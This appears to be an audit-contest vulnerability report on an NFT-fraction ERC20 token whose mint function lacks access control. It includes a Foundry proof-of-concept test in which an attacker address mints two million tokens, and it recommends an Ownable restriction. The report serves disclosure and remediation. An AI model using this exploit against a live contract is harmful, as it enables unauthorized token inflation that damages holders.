Submission Details
Severity:
`RC20ToGenerateNFTFraccion:mint` function has no access control and anyone can mint tokens.
Summary
The `ERC20ToGenerateNFTFraccion:mint` function lacks access control so anyone can call it to mint tokens.
Vulnerability Details
Create a test file named Exploit.t.sol in your unit test directory and insert the bellow code:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import {Test} from "forge-std/Test.sol";
import "../../src/token/ERC20ToGenerateNftFraccion.sol";
contract Exploit is Test {
address public attacker = address(0xBEEF);
ERC20ToGenerateNftFraccion public erc20Contract;
function setUp() public {
erc20Contract = new ERC20ToGenerateNftFraccion("TestToken", "TT");
vm.label(attacker, "Attacker");
}
function testMintExploit() public {
vm.startPrank(attacker);
uint256 amountToMint = 2_000_000 ether;
erc20Contract.mint(attacker, amountToMint);
vm.stopPrank();
uint256 balance = erc20Contract.balanceOf(attacker);
assertEq(balance, amountToMint, "Balanca doesn't match minted amount");
emit log_named_uint("Attacker Token Balance", balance);
}
}
Impact
HIGH: Since anyone can mint unlimited tokens without restriction, an attacker can unjustly mint tokens for themselves to later sell messing with the tokenomics and ecosystem.
Tools Used
Manual code review.
Recommendations
Use Openzeppelin's Ownable library to allow only the owner to mint tokens and trade the `mint` function for `safeMint` as it is safer.
Updates
Lead Judging Commences
fishy 4 months ago
Submission Judgement Published Assigned finding tags:
Lack of token access control chekcs
Any person can mint the ERC20 token generated in representation of the NFT
Rewards breakdown
nSLOC
181This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.